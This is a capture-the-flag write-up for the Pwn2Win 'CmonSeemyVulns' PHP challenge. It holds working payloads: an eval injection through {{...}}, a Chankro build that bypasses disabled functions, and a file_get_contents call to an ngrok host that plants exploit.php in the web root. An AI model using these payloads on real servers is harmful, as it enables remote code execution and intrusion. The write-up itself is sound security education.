Pwn2Win - CmonSeemyVulns - Writeup

 

Description

2021-05-30_21-03

We were given the source code and the Dockerfile, we can build it locally and work on it directly on our own system.

c_mon_see_my_vulns

Code Review

2021-05-30_20-54

Snipped code from: index.php (Only PHP Part !)

code

The 7th line of the code appears to contain an eval function that is called within the do_calcs function. This function is called in line 17 of the code. Before we can examine this further, we need to check the 4th line of the code, which appears to contain a regular expression pattern. This suggests that our PHP code must be placed within {{PHP EVAL CODE}} in order to be evaluated properly.

Solution

Let’s try to send a simple payload 200,{{phpinfo()}}

This simple phpinfo function is going to be executed

2021-05-30_21-11

But if we take a look on the disabled functions list, we see a list of functions that are restricted or not available for use.

exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname,pcntl_exec,expect_popen

In cases where we need to bypass disabled functions, we can use Chankro

First let’s build our payload:

python2 chankro.py --arch 64 --input shell.sh --path /var/www/html --output exploit.txt

The shell.sh content:

#!/bin/sh
/readflag > /var/www/html/flag.txt

Now that we have saved the shell, we can host it on a local web server using PHP or Python.

200,{{file_put_contents("/var/www/html/exploit.php",file_get_contents("http://XXXXXXXXX.ngrok.io/exploit.txt"),FILE_APPEND)}}

After that we can browser the file http://127.0.0.1:1337/exploit.php

Flag

We should be able to retrieve the flag easily http://127.0.0.1:1337/flag.txt